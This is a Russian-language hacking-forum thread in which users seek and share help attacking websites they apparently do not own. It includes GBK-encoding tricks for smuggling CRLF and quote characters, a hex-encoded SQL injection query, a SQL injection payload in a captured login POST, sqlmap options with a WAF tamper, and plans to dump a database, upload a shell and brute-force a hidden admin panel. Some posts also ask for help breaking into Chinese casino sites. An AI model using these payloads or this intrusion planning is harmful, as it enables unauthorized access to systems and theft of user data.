[web-hacking] Ваши вопросы

[sesh]

В догонку к байпассу символов, добавлю скорее как заметку. Оказалось, что можно заюзать GBK Encoding (в некоторых случаях). Но это рили отработало )))
Сабж:

嘊 = %E5%98%8A ⇒ %0A
嘍 = %E5%98%8D ⇒ %0D
嘾 = %E5%98%BE ⇒ %3E (>)
嘼 = %E5%98%BC ⇒ %3C (<)
嘢 = %E5%98%A2 ⇒ %22 (')
嘧 = %E5%98%A7 ⇒ %27 (")

Добавлю от себя, если энкодинг не помог, можно попробовать hex значения, как минимум в случае с кавычками. Лично в моем вопросе сверху выручило. Берёте саму строчку без кавычек, которую нужно пропихнуть, переводите её в hex значение, и используете в формате 0x + hex. Пример:
SELECT sub.* FROM (SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE 0x61646d696e5f757365725f73657373696f6e) sub

 

[noonenowhere000]

И еще вопрос в догонку к предыдущему.
На этом же сервисе, как я понял, есть один вебапп, разбитый на 32dns имени. Открывая любой из них ты открываешь этот вебапп. Цель: забрать БД.
Сам сервис имеет 80. 443. 6022. 7800 порты (если переходить по ip, на который все эти 32dns ссылаются).
80 - nginx welcome
443 -- 403 forbiden (как я понял, тут должен был быть коренной вебапп, но доступ к нему закрыт)
6022 -- OpenSSH 7.4, можно енумерить пользователей
7800 -- админка соответственно.
Сервис точно имеет БД, т.к. есть регистрация/кошельки/номера и т.д., + открывая любой из 32 вебаппов ты можешь залогиниться под своими кредами. Но неизвестно в каком виде БД. Sqlmap и остальные пока не видят. Предполагаю, что NoSQL.

вопрос в следующем:
Непонятна схема, как вообще в подобных приложениях все работает.
Несколько DNS имен, это просто несколько контейнеров открыто, которые ссылаются на одну БД при попытке входа?
Все загрузки совершаются с cdn (аватарки например, какие то скрипты). Получается, если я попытаюсь залить шелл, он будет на cdn, которая просто содержит условно папку с аватарками и все, к самому коренному домену я не обращусь? Или в таких случаях на CDN обычно лежит и файловая система вся? Включа бд, какие-то скрипты и т.д.
Что самое интересное, при обращении к самим вебаппам и реверсе их имени в DNS выдается IP сервиса со всем тем, что я описал. А при запросах к CDN -- адрес cdn.
Клаудфара при этом там не настроена, поэтому все что скравлил Окунь, все методы, все доступно, главное правильно спросить. Сканить/Долбить можно чем угодно.
Посмотрел по шодану, все имена и вебаппы ссылаются на одно DNS имя, трафик в котором без HTTPS.

 

[etc/passwd]

Есть вход в админку на сервисе в виде ip:port/xxxxxxxx, где xxxxxxx -- что-то между aaaaaaaa и 00000000 (т.е. рандомные 8 символов). Есть у кого-то словарь под такое? Да и вообще есть ли смысл фаззить, или это займет 100000+ лет?

Зачем словарь? в бурпе есть брутфорс. Но займет у тебя много времени, если 10 потоков в секунду будут получать ответ, то 115 дней полностью перебор по 8 символам займет, а может тебе повезет и в первую минуту поймаешь.

 

[PrikolBullet]

Возможно обойти в adminer? LOAD DATA LOCAL INFILE forbidden in /home/html/www/adminer.php Пробовал стандартные байпассы

 

[MrDuck]

Сканил сайт окунем и он выдаёт такую язву The SSL server (port: 443) encrypts traffic using TLSv1.0. (и уже не на первом сайте так), что это за язва и как её раскрутить, помогите форумчане

 

[dabdab]

Сканил сайт окунем и он выдаёт такую язву The SSL server (port: 443) encrypts traffic using TLSv1.0. (и уже не на первом сайте так), что это за язва и как её раскрутить, помогите форумчане

1) Это недостаток безопасности, а не уязвимость;
2) Там в окуне есть вкладка, в которой говорится как "злоумышленник" может использовать найденное, а так же вкладка с описанием;
3) Это для MITM;
4) Толку от этого немного, процентов 20%(мб больше, без понятий) сайтов с такой "фичей".

 

[MrDuck]

1) Это недостаток безопасности, а не уязвимость;
2) Там в окуне есть вкладка, в которой говорится как "злоумышленник" может использовать найденное, а так же вкладка с описанием;
3) Это для MITM;
4) Толку от этого немного, процентов 20%(мб больше, без понятий) сайтов с такой "фичей".

А с устаревшим ssl сертификатом можно что-то сделать?

 

[MrDuck]

Какие существуют админские файлики в вп, по типу wp-admin/файл

 

[BLUA]

А с устаревшим ssl сертификатом можно что-то сделать?

Что-то можно, а что-то нет, всё зависит от таргета. Как тебе уже сказали, что хакер использует это как возможность....возможность развить атаку....возможность в итоге нанести ушёрб им и пользу себе.

А возможно и нет. А как понять ? А только таргет смотреть.
Где искать информацию ? OWASP - там что то вроде было по этому поводу

 

[BLUA]

Какие существуют админские файлики в вп, по типу wp-admin/файл

Структура файлов вордпресс гуглиться на раз два. Думаю что сам уже решил данную потребность

 

[BLUA]

Сканил сайт окунем и он выдаёт такую язву The SSL server (port: 443) encrypts traffic using TLSv1.0. (и уже не на первом сайте так), что это за язва и как её раскрутить, помогите форумчане

Так же он тебе написал, чтобы пофиксить данную траблу, то нужно перейти на версию

TLSv2.0

т.е. окунь просто снял баннер и понял что протокол там старой версии

Ошибка ли это? Скорее всего недочёт.
Так же если ты обратишь внимание, то так же он делает с другими.....например с тем же вордпресом, если его версия далека от актульной, то он об этом сообщит....и т.д.

 

[PrikolBullet]

Кто какие сервисы использует для оценки популярности сайта? Желательно с бесплатным API. У Simularweb платный, Алекса уже покоится. Заранее спасибо

 

[mayone]

подскажите плиз как акунетикс увидел бд , а я и запрос норм делаю , все ровно не хочет открывать, правда там показывает что ваф , как это аунетикс тогда его обошел?

Screenshot

Captured with Lightshot

prnt.sc

POST https://www.site.com/login.php HTTP/1.1

Host: www.site.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtEMail"

testing@example.com
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtPW"

u]H[ww6KrA9F.x-F
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="loginType"

Normal
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="process"


------------YWJkMTQzNDcw--

 

[BLUA]

подскажите плиз как акунетикс увидел бд , а я и запрос норм делаю , все ровно не хочет открывать, правда там показывает что ваф , как это аунетикс тогда его обошел?

Screenshot

Captured with Lightshot

prnt.sc

POST https://www.site.com/login.php HTTP/1.1

Host: www.site.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtEMail"

testing@example.com
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtPW"

u]H[ww6KrA9F.x-F
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="loginType"

Normal
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="process"


------------YWJkMTQzNDcw--

А где в запросе окуня полезная нагрузка ?

 

[mayone]

А где в запросе окуня полезная нагрузка ?

POST /admin/login.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMxxzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Cookie: PHPSESSID=9e785a0aa2609xxxx31c6145b47a; humans_21909=1; cartNum=5368663
Content-Length: 397
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.site.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtEMail"

-1' OR 3*2*1=6 AND 000255=000255 --
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="txtPW"

u]H[ww6KrA9F.x-F
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="loginType"

Normal
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="process"


------------YWJkMTQzNDcw--

вот, впихивал в тхт как вышк писал, ничего не выходит, но акунетикс то показывает что там бд есть..

Screenshot

Captured with Lightshot

prnt.sc

--dbms="mysql" --tamper=between --time-sec=32 --level=5 --risk=3 --dbs

 

[mayone]

del

 

[0x01234567]

Поделитесь хорошим, актуальным и толстым словарем для брута веб директорий

 

[SenjorZeroday]

Возможно обойти в adminer? LOAD DATA LOCAL INFILE forbidden in /home/html/www/adminer.php Пробовал стандартные байпассы

чекай версию adminer, на даный момент известные експлоиты уже пофикшены и более 99 процентов пользователей перешли на последние версии этой среды

 

[SenjorZeroday]

dell / lag

 

[noonenowhere000]

Кто-то ломал китайские казино? Они сделаны +- по общему плану, с применением какого-то wjapp, на апишке которого все взаимодействие держится. Я уже просто все перепробовал и пока глухо.